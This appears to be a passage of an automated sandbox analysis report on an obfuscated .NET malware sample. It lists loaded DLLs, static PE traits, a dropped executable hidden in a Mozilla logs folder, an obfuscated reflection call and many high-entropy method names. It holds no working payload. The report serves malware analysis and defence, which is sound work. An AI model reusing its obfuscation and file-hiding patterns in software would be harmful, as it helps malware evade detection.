                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                            Source: Window Recorder Window detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Static PE information: Virtual size of .text is bigger than: 0x100000
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Static file information: File size 2335232 > 1048576
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x239a00
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                            Data Obfuscation

                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, B3txKmJG66b3TvIggSB.cs .Net Code: Type.GetTypeFromHandle(PZVO9XQyvEW6EWkCOTf.bIKBvN28j2l(16777425)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(PZVO9XQyvEW6EWkCOTf.bIKBvN28j2l(16777246)),Type.GetTypeFromHandle(PZVO9XQyvEW6EWkCOTf.bIKBvN28j2l(16777260))})
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Code function: 0_2_00007FF848DF00BD pushad ; iretd 0_2_00007FF848DF00C1
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Code function: 0_2_00007FF848DF4C1A push esi; retf 0_2_00007FF848DF4C21
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Code function: 0_2_00007FF848FAC3FB push ecx; iretd 0_2_00007FF848FAC3FC
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Code function: 0_2_00007FF849042601 push es; ret 0_2_00007FF849042605
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Code function: 0_2_00007FF8490418E2 push edx; ret 0_2_00007FF8490418E4
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Code function: 0_2_00007FF849044714 push edx; ret 0_2_00007FF849044716
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Code function: 0_2_00007FF849042B42 push edi; ret 0_2_00007FF849042B43
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Code function: 53_2_00007FF848E200BD pushad ; iretd 53_2_00007FF848E200C1
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Code function: 53_2_00007FF848E24C1A push esi; retf 53_2_00007FF848E24C21
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe High entropy of concatenated method names
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, otpoGTCcQMZp3wPo5xn.csHigh entropy of concatenated method names: 'rBmCnbTH6u', 'r1tCkDV4IN', 'eRYCEl8JoZ', 'vOECapUEBK', 'nXQChXJKOB', 'KeoC6u4QQp', '_4tg', 'wk8', '_59a', '_914'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, pJIJLUAE8v2YFOD09Go.csHigh entropy of concatenated method names: 'CdXAh5oZaS', 'swmA6a6f4u', 'SoFAsc9diL', 'OxEANGjhsp', 'AOPAFSREiK', 'M96aq1Uc8O8rgqRBtH29', 'VEnBlOUcUyQsp38gZ1ry', 'I0pCSEUcBnbnn7D4oSJv', 'SqpiQnUcY3WFkyNLP9kb', 's97ptGUcvgydV7SGCPjY'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, RfoLfwUH8RAQV8sRBm0.csHigh entropy of concatenated method names: 'c3G', 'V29', 'u9l', '_2Q4', '_78M', 'atAUI0PvadZ', 'n6rU8F0761x', 'eRnbgxUVYxcvtOqTDitn', 'jqTmoJUVvptivO3Lf425', 'bHOPmSUVtRXJ4GqI6apY'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, PYZXvvYf49oySEdTINW.csHigh entropy of concatenated method names: 'BRlYNfcYGT', 'X3GpcHUonCnBnPYcCBZj', 'gMCBjFUoknBXu7NarTHK', 'gwgSb4UoEaLCgJqSWWOm', 'JJLYkxb46E', 'kHUYEpPDnK', 'cI4YaP4xXd', 'NX1YyKUo3pxfwXGxZc28', 'q76XTPUoL9QyGqckegFO', 'KoB3CkUojJS0tS9QH1Gi'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, WAFgav3bYkZ6iAl5HF8.csHigh entropy of concatenated method names: 'vUO32aglGJ', 'mp53GldtAE', 'UMI37gXNiU', 'Roy3ZH4brP', 'w2D35Pb6fp', 'yvU319muGA', 'H1s3PGdGkI', 'mZZ39Wm8ir', 'LQ33MrTaYb', 'iBc3VF4N4n'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, a7B0JrmzObeCCtmOJs5.csHigh entropy of concatenated method names: '_26K', '_1U7', '_5gR', '_58D', 'H8v', 'JqK0UhGaTS', 'mn60Blpa7T', 'gY2', 'rV4', '_28E'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, QLEqd5yeA3ehGBr5A76.csHigh entropy of concatenated method names: 'yolRx1UEcmQJIcy4ptvR', 'bod2PAUE35XkUNk5GoRv', 'TStXV8UELmfGZFtldAsi', 'xNqv75UEf222aexyc1Uq', 'jmYZPR7Kvi', 'saLTT7UEaaqHQE2a47IS', 'oscGE5UEk43aVE8ojyPO', 'TuyF7XUEEyx7MQWjKE2P', 'rFcN0iUEh7ndGPHZtwea', 'yKoZVhd2yb'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, tHAAHjoRh1feG0AOJyt.csHigh entropy of concatenated method names: 'a4Q', '_6h5', '_4fY', '_32D', 'j7E', 'Lr9', '_7ik', '_9X3', 'g6m', '_633'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, lnX7gnwJQkLP0ZywDe1.csHigh entropy of concatenated method names: 'My5', 'V4X', 'zT6', 'TqEwQxtvW9', 'ohpUIn3l4QT', 'PMGwX7LHv6', 'rSUUIklJRPw', 'Uq06jOU36s3ejjC5GBcp', 'V1G49KU3atK6QrQrjKR8', 'ODWZPcU3hJWNLLbMnyyx'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, lOpa0QHZwdmAYd1Li0Z.csHigh entropy of concatenated method names: 'f86pmJRXuI', 'wm02FgUFQEtSYDXvyr2V', 'WDqDSqUFJOUZEcYB6ENl', 'wFxii6UFOVJBM53Ppycq', 'OZoeQBUFXOOyeCd89ZZY', 'i5X', 'TZcH1jFmbY', 'W93', 'L67', '_2PR'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, IqZmiYIsU1GgVaBhusb.csHigh entropy of concatenated method names: 'oK2Il1L6jm', 'pJKIKkvaQh', 'EpWIJKdYZK', 'WlQIOl30xY', 'ei4IQ2UXTN', 'O1NIXcjwuH', 'TofIzK5hYq', 'HfquxQUjPN8Ualk5cHcI', 'AtFnpiUj9ODEdRBFlrpP', 'qnFoeLUj5ARqFQfg8dDX'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, DGFlcE80b8JNobvVUXc.csHigh entropy of concatenated method names: 'o8V8VC9rTu', 'HoJ8C2cXTy', 'LAt844nNPn', 'sfqkvOU4itA941eDPMBm', 'QpiGM7U4rOvUoHbPc0ZD', 'zctVR7U4WEgwWlJTTUDq', 'tmG1g7U4AlaDvpkY1ApV', 'mhZ81PcDX6', 'tKv8POOMee', 'P6sGyQU4xGiUODaGSiGl'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, vnpnbCxzghZ0BorguNs.csHigh entropy of concatenated method names: 'A9CwtU2g9l', 'FtUc8jUTnRuWioxmbYGg', 'P59iSjUTkVjwXDmkhwBY', 'babmCQUTEyH8qoqGvB10', 'kdEakGUTa7Edoh594WUX', 'eq7', 'd65', 'f3PUYGepihL', 'i9cUY77fMA1', 'ODgUIotBy2y'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, OccFLeUijS83Gb9EMKw.csHigh entropy of concatenated method names: 's2CUmnMYGi', 'nc4U0kgLk2', 's7ZUyZMdvm', 'gKeXVxUMcRiRVZj1nMep', 'Y2tulRUM3MZOsiUkauKg', 'vjPN8tUMLoxawwjABaX6', 'ECERYqUMfraZo3nEdObJ', 'PEo8l8UMn9cT5KBGL4rY', 'YK9rC0UMksar5OjhPWLW'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, Rw9aZa8jr9fAb5q2pwr.csHigh entropy of concatenated method names: 'Dbx83CMD3O', 'X5i8LCIVOn', 'TEP8c8bPdP', 'Pe58fxsEP1', 'ehv8nl6gpn', 'MWk8k1PiFO', 'wD38EVFQOF', 'Amn8aBl2yL', 'XTS8h8HKKs', 'Smd86PEDaY'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, Sdda55wLc9fEvK4sCqf.csHigh entropy of concatenated method names: '_2SY', 'MWpUITJPZow', 'OQrwfRACND', 'fdfUI3WSZC1', 'nJGns9U3POsikHwkw3m2', 'PNeaehU350b9FoJvT1AS', 'bysIiLU31y8kfEdswRIt', 'A3UcARU39PG3JmWOxoxv', 'kAEQTiU3Mo5tYhoRYXjD', 'gcIURaU3Vqx5w4lhC3Gs'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, CNGS1Ywx4QKFymOCPD9.csHigh entropy of concatenated method names: 'qicwiJhaTf', 'tIryL2UTe9G9r89qvfGp', 's0XdslUTlkBSHYxW9ubv', 'YAnjuaUTKlQ5tbORlZ6r', '_53Y', 'd65', 'W6IUY5GZBH7', 'Wv4UY1rtd0o', 'fXCUIubhyGP', 'zp2UYRcxbBk'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, pXW4euSHeJXI9S28nlT.csHigh entropy of concatenated method names: 'R3gS6gEK7o', 'ba3SsgYIti', 'z8cSNZ84Dk', 'FQWYhdUpPWHZH81129cU', 'hKs5qbUp97HxZ49kiCo1', 'IkHrfyUp5mR5xyaFpEiL', 'HqZqKiUp1QYdiVIGOxZq', 'MvFSjZD9xL', 'w7OST8Faml', 'KlZS3wnnhd'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, rPwErV8QS2EWByRUlUd.csHigh entropy of concatenated method names: 'HPgYrjaYPr', 'N9frsSUovrp1m0miUb3c', 'fJeERXUotrqswVV0V3iA', 'hNQ8QpUo80pDhCV8yceZ', 'gmmV1cUoYI50flDT0b8X', 'qJNaBjUoweaOBo66dUoL', 'Ju4ENsUoID8uttOcZXIj', 'BEeT9HUoxwQFLw7HIGnk', 'FMt9vGUogHNVJ5JRROdn', 'wEeYZeDtUt'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, vc1uUZxMZDE6NGQgVac.csHigh entropy of concatenated method names: '_71a', 'd65', 'htqUYgZpHjj', 'yVjUYWrsUmP', 'JAEUI9J3ooJ', 'zp2UYRcxbBk', 'VMWvo4UTRN03y5UIDI0W', 'vgRtZTUTUc8N8WH94O2l', 'l0gL8NUTBLyZlwYTMjb5', 'a2jF2uUT8S8B97b7CpjZ'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, jLXs83BqEYiLKytjiG5.csHigh entropy of concatenated method names: 'K6gBGjQShY', 'pk4B7vH6QU', 'UhX4XTUCBrN581dGFY8r', 'IGi31eUC82QLTJ2FCf7Q', 'LkKsRPUCYr2X07XFPZYR', 'pcFLJ7UCvxYtaWwhWaMA', 'eqrFefUCtEhLii5kC5IN', 'nOHZbPUCSPj0W5yqWYjZ'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, vJ9xG3UfoFXp3qtLQsS.csHigh entropy of concatenated method names: 'n39', 'V29', '_4yb', '_2Q4', 'p93', 'di1UIyOAuTt', 'n6rU8F0761x', 'XHPBQCUVgNW27mIJArQa', 'THTpqpUVWBHpryaFiZCF', 'Sm2bh5UVA36CZiHj3Oeu'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, urbpt3Q7MLrEJObSEg4.csHigh entropy of concatenated method names: 'cekQH5xZ4K', 'ctBQpPucfA', 'oD0QjuqEJw', 'wdYQTnKBRQ', 'd38Q3V4nb8', 'TG0QLk32Nf', 'GArQctnwaI', 'X5VQfx4V1A', 'DkWQnaMqU6', 'iNsQk4angb'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, L0jcodoMDE7vT5FwGl1.csHigh entropy of concatenated method names: '_57l', '_9m5', 't8K', 'k49', 'p65', '_3B1', '_4Pp', '_3M7', '_7b3', 'fAL'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, AO8MU0BU1a9hwE6yPuY.csHigh entropy of concatenated method names: '_5E9', 'V29', 'e6S', '_2Q4', 'CVq', 'ujvUI2IUaYg', 'n6rU8F0761x', 'DIgJwtUVTfjDNeidY1RQ', 'Pg2nh3UV3At92UGoBjMH', 'ivFINAUVLyW9GwaKaEVp'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, pKx0ZJyPx8QC5XVopv7.csHigh entropy of concatenated method names: 'vNq', 'O3Q', 'a43', 'V8g', 'g39', '_9By', 'h74', 'fl2', '_4L8', '_8e1'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, i8K3StFDUFoTg9qoEj2.csHigh entropy of concatenated method names: 'NnQUIhQ3cfg', 'mtAFeErmpr', 'xphFlD3J9L', 'mvoFK9CbFG', 'e5qscNUluNy8OPRDUirO', 'mEnNFFUlHUPlpmi1RX39', 'q8cMViUlpTkn3go2N5iB', 'MrgsAKUljfk6lFeyJTw7', 'xbrx1WUlTkFrE4L6yCcg', 'chCNguUl3pUTmQb6x4OA'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, URuHrCBIMbthiy4wX3j.csHigh entropy of concatenated method names: 'MhMBwTTXsc', 'i1lBgTX7V7', 'JYGBWywKEg', 'JcspRDUV6ti4FY4eCNhr', 'vLN7K3UVaWyMa6l9dqTl', 'MTEmjKUVhEVsU681ud31', 'p7N70yUVsHDFa32d7iwR', 'BwGl11UVNcWAmZBMo2ZL', 'vKnBpCUVFYIDeydLivYM', 'jP3EcgUVDr6AqrnnshOS'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, qUhfWMxZTKKnp3HJBiU.csHigh entropy of concatenated method names: '_64Z', 'd65', 'xLvUIPX4AcM', 'zp2UYRcxbBk', 'u08x1T7Noc', 'F98Bu6UjKxkumHass89G', 'hmcH5FUjJSKTlSjLfAsE', 'aYEoEZUjOLHf6cS15sBg', 'GixaIwUjQbn8Ww3khU3o', 'mIS9APUjXtY10K8sHw3B'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, T7M26dwmf00XyV70fot.csHigh entropy of concatenated method names: '_5t1', 'd65', 'OK1UY9DtVsh', 'qS6UYMSu9Ox', 'XyUwy655B7', 'G4dUIHfdncl', 'zp2UYRcxbBk', 'MGiHC3UTOedr6W1rJA3P', 'N647nRUTQZwv1mF0ubgT', 'W0aPPJUTXxeIEdV4d6hV'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, WOCrHDZTAWo5LqBCUyn.csHigh entropy of concatenated method names: 'kk8MPk8kNI', 'MQoM9L531b', 'hiq0a6UhogHhHQGqGZwE', 'JFGljqUhCPqwFuUkHNn7', 'toSl1JUh4WMCY80ZrS36', 'ppHlZUUhuhXdaRin1QTh', 'jOpMu4sB6y', 'CNcuv8UhTPTnVaCBhNht', 'KA2JkdUhp9n4LvoVGuZ2', 'KGOi9hUhj0ykpaKPVdJR'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, wVXthH3n8T6G3myquXS.csHigh entropy of concatenated method names: 'OCE3ED2003', 'XA23auVsHO', 'pf73hUbCHp', 'fWV36Sk9qt', 'g0b3s7SS0h', 'dvj3NOKfMl', 'kWC3FIhp7K', 'c9C3DAFAgG', 'dpO3dXAw75', 'Fb93eh5Zyc'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, K3MrYRxoS3lKpqkMQ14.csHigh entropy of concatenated method names: 'NlNxfb1bmk', 'gxxQjnUTmsJR7yBrkjcI', 'M2LGRwUTibWgPvjRMIYS', 'iufvhBUTrm9khMqEA3Ki', 'eBVU19UT090TO0g5pq0u', 'H05MVJUTygoL2DCGGjhh', 'UU8', 'd65', 's0PUYiKp0dm', 'P3BUYrDiZEk'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, o7buEyjIKSG2WlWQXtc.csHigh entropy of concatenated method names: 'jX1jwSowMg', '_64r', '_69F', '_478', 'sA5jg23FWR', '_4D8', 'p6YjWn3XZ1', 'fgJjAseEFc', '_4qr', 'OpijiHGuQr'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, P5Cf1e436KNTloDetv9.csHigh entropy of concatenated method names: 'r004cgjU3G', 'gSv4f4Mb4c', 'PfT4nfSYqq', 'xuw4kwrFwU', 'sps4EMacoo', 'hcMWcAUNGfHSaKVt20iX', 'TKxEJGUN7utJA46xXgj2', 't3Ux3iUNZoiH7OawM27x', 'JIfmMGUNqc2evlXmNgtd', 'W7nP0HUN2pSUu3RuuJjt'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, hLDRxa8wZGXKfG11WjD.csHigh entropy of concatenated method names: 'Dly8W1vUFi', 'V1G8AZiqsx', 'Ed58iOPNJL', 'PmJaDfUCeumTToxOnDn9', 'GwsXYuUCl6kPetnKjKg8', 'rbVlmhUCD2RUipRAIcFc', 'FPSOkdUCd6V1q6IrQ90b', 'NQaD0YUCKLdd7TkWvisS', 'vTlfgGUCJpm5FilXxFTE', 'PasvvtUCO8sTO5qjsvMH'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, JyV4N6dY0a6hTdngRaX.csHigh entropy of concatenated method names: 'IpDdtQN3OQ', 'LHQdSVf2kf', 'M1mdIiL7I0', 'nA7dxebYaZ', '_0023Nn', 'Dispose', 'KZMJ4JUJRAE1bfRmks2y', 'n385aIUKXUJBctKNrhu9', 'R1v47MUKzkhdTNdvVUrU', 'JVWT10UJUY2bCP37Gk9E'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, jgxeTiFJwhJAMyAckUe.csHigh entropy of concatenated method names: 'jQ8DWR6stn', 'ojduNYUKiKr1y4CeUcUr', 'iM4ZgVUKrG8EioFuclEc', 'xkFCBaUKWxZRp0Gca64f', 'JUGkmQUKAqctdYIBYGCJ', 'CPX', 'h7V', 'G6s', '_2r8', 'rqoUtpijpcn'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, VxiCRQxNtOoEkFSO2FP.csHigh entropy of concatenated method names: '_8X5', 'd65', 'jZcUYyeBPqI', 'HgoUYbX3aQr', 'G5yUICD1T3S', 'zp2UYRcxbBk', 'xQI5V4UTPDdBbCfsg1wC', 'irfrWqUT5658N1x75EOa', 'YyNjs5UT177P7OHIib4e', 'BsdA4ZUT9LfQGFoRj1KQ'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, wVGbI1Vdef2kCBdRYPL.csHigh entropy of concatenated method names: 'RQvVl3WWep', 'ySHVKvX92H', 'rnWVJ5cYZp', 'm7mVOkSruj', 'c1RVQait7L', 'WLOVXg9SYY', 'perVz0DJEF', 'X7PCRlVpXW', 'tDgCUmW3Bn', 'HOlCBVMlmq'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, QFxANcutIyoqgSXg9je.csHigh entropy of concatenated method names: 'hHKEdgUF33ao0UGaaDcP', 'N0hCNcUFj9YCuyWuyDle', 'xQYXOsUFTLTOug5YLpMX', 'ylpS2yUFL0Q1WlFNJmVk', 'XpWuICmSJ8', '_1R8', '_3eK', 'RDkux6sSvD', 'YqVuwmHwkW', 'IVnug6x5Vq'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, fN8GZyVrLBPXkDlOUPS.csHigh entropy of concatenated method names: 'qlJV0KPcJ6', 'lJgVyXQ9GC', 'AkDVbZLqww', 'am7eJEU6WajBqJ0C6cGR', 'U07kbcU6w1FZJqE5AMcU', 'aVjonPU6giVMCG4CxCNL', 'b1QZLXU6An4oFEbDE6tI', 'qiGHDtU6ikKXwFSJVNg2', 'F2ksvAU6r7a4hN9mXH6u', 'NMwIS6U6mRg6ppl2VU6a'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, pqoghDvZRGvjHhQRHRS.csHigh entropy of concatenated method names: 'EoMvj7GsOB', 'q41vTAjKVL', 'qQ1nbUUu4G0oKDOB9hXG', 'zryZeTUuohPKSs5DrXY3', 'M3n8ISUuuAkY36O2cKA7', 'QNFv1O9HBv', 'pD5vPtiByM', 'Xrjv9gTbp2', 'CrmvMdAsl6', 'mnZvViMYbf'
